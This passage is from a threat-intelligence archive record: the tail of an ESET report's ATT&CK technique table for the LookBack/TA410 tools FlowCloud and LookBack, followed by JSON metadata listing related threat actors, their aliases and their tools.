over\r\nHTTP.\r\nT1095\r\nNon-Application\r\nLayer Protocol\r\nLookBack can communicate over raw TCP sockets.\r\nT1132.001\r\nData Encoding:\r\nStandard Encoding\r\nFlowCloud uses Protobuf to encode C\u0026C commands and\r\nconfiguration.\r\nT1132.002\r\nData Encoding: Non-Standard EncodingLookBack encodes binary data using a custom hex-encoding\r\nmethod.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric\r\nCryptography\r\nFlowCloud can use XOR, TEA, RC4 and a modified AES\r\nalgorithm to encrypt traffic and files.\r\nExfiltration T1030\r\nData Transfer Size\r\nLimits\r\nFlowCloud uses local caches to stage data and exfiltrates their\r\ncontent when it reaches a size specified in its configuration.\r\nImpact T1529\r\nSystem\r\nShutdown/Reboot\r\nFlowCloud can force a system crash or shutdown.\r\nSource: https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/" ], "report_names": [ "lookback-ta410-umbrella-cyberespionage-ttps-activity" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "ec14074c-8517-40e1-b4d7-3897f1254487", "created_at": "2023-01-06T13:46:38.300905Z", "updated_at": "2026-04-10T02:00:02.918468Z", "deleted_at": null, "main_name": "APT10", "aliases": [ "Red Apollo", "HOGFISH", "BRONZE RIVERSIDE", "G0045", "TA429", "Purple Typhoon", "STONE PANDA", "Menupass Team", "happyyongzi", "CVNX", "Cloud Hopper", "ATK41", "Granite Taurus", "POTASSIUM" ], "source_name": "MISPGALAXY:APT10", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "faa4a29b-254a-45bd-b412-9a1cbddbd5e3", "created_at": "2022-10-25T16:07:23.80111Z", "updated_at": "2026-04-10T02:00:04.753677Z", "deleted_at": null, "main_name": "LookBack", "aliases": [ "FlowingFrog", "LookBack", "LookingFrog", "TA410", "Witchetty" ], "source_name": "ETDA:LookBack", "tools": [ "FlowCloud", "GUP Proxy Tool", "SodomMain", "SodomMain RAT", "SodomNormal" ], "source_id": "ETDA", "reports": null }, { "id": "9ffcbb0c-7a0f-419f-a174-f18a02ce47f1", "created_at": "2023-01-06T13:46:39.059774Z", "updated_at": "2026-04-10T02:00:03.199867Z", "deleted_at": null, "main_name": "TA410", "aliases": [], "source_name": "MISPGALAXY:TA410", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3e8f802c-efba-45ff-8844-5ea4e4a5297d", "created_at": "2023-11-07T02:00:07.092751Z", "updated_at": "2026-04-10T02:00:03.404589Z", "deleted_at": null, "main_name": "Witchetty", "aliases": [ "LookingFrog" ], "source_name": "MISPGALAXY:Witchetty", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "08623296-52be-4977-8622-50efda44e9cc", "created_at": "2023-01-06T13:46:38.549387Z", "updated_at": "2026-04-10T02:00:03.020003Z", "deleted_at": null, "main_name": "Equation Group", "aliases": [ "Tilded Team", "EQGRP", "G0020" ], "source_name": "MISPGALAXY:Equation Group", "tools": [ "TripleFantasy", "GrayFish", "EquationLaser", "EquationDrug", "DoubleFantasy" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "2d9fbbd7-e4c3-40e5-b751-27af27c8610b", "created_at": "2024-05-01T02:03:08.144214Z", "updated_at": "2026-04-10T02:00:03.674763Z", "deleted_at": null, "main_name": "PLATINUM COLONY", "aliases": [ "Equation Group " ], "source_name": "Secureworks:PLATINUM COLONY", "tools": [ "DoubleFantasy", "EquationDrug", "EquationLaser", "Fanny", "GrayFish", "TripleFantasy" ], "source_id": "Secureworks", "reports": null }, { "id": "ba9fa308-a29a-4928-9c06-73aafec7624c", "created_at": "2024-05-01T02:03:07.981061Z", "updated_at": "2026-04-10T02:00:03.750803Z", "deleted_at": null, "main_name": "BRONZE RIVERSIDE", "aliases": [ "APT10 ", "CTG-5938 ", "CVNX ", "Hogfish ", "MenuPass ", "MirrorFace ", "POTASSIUM ", "Purple Typhoon ", "Red Apollo ", "Stone Panda " ], "source_name": "Secureworks:BRONZE RIVERSIDE", "tools": [ "ANEL", "AsyncRAT", "ChChes", "Cobalt Strike", "HiddenFace", "LODEINFO", "PlugX", "PoisonIvy", "QuasarRAT", "QuasarRAT Loader", "RedLeaves" ], "source_id": "Secureworks", "reports": null }, { "id": "e0fed6e6-a593-4041-80ef-694261825937", "created_at": "2022-10-25T16:07:23.593572Z", "updated_at": "2026-04-10T02:00:04.680752Z", "deleted_at": null, "main_name": "Equation Group", "aliases": [ "APT-C-40", "G0020", "Platinum Colony", "Tilded Team" ], "source_name": "ETDA:Equation Group", "tools": [ "Bvp47", "DEMENTIAWHEEL", "DOUBLEFANTASY", "DanderSpritz", "DarkPulsar", "DoubleFantasy", "DoubleFeature", "DoublePulsar", "Duqu", "EQUATIONDRUG", "EQUATIONLASER", "EQUESTRE", "Flamer", "GRAYFISH", "GROK", "OddJob", "Plexor", "Prax", "Regin", "Skywiper", "TRIPLEFANTASY", "Tilded", "UNITEDRAKE", "WarriorPride", "sKyWIper" ], "source_id": "ETDA", "reports": null }, { "id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a", "created_at": "2022-10-25T15:50:23.298889Z", "updated_at": "2026-04-10T02:00:05.316886Z", "deleted_at": null, "main_name": "menuPass", "aliases": [ "menuPass", "POTASSIUM", "Stone Panda", "APT10", "Red Apollo", "CVNX", "HOGFISH", "BRONZE RIVERSIDE" ], "source_name": "MITRE:menuPass", "tools": [ "certutil", "FYAnti", "UPPERCUT", "SNUGRIDE", "P8RAT", "RedLeaves", "SodaMaster", "pwdump", "Mimikatz", "PlugX", "PowerSploit", "ChChes", "cmd", "QuasarRAT", "AdFind", "Cobalt Strike", "PoisonIvy", "EvilGrab", "esentutl", "Impacket", "Ecipekac", "PsExec", "HUI Loader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434608, "ts_updated_at": 1775792025, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/87d35f03223812c5b64a7ffcc39fbbcef645e5b9.pdf", "text": "https://archive.orkl.eu/87d35f03223812c5b64a7ffcc39fbbcef645e5b9.txt", "img": "https://archive.orkl.eu/87d35f03223812c5b64a7ffcc39fbbcef645e5b9.jpg" } }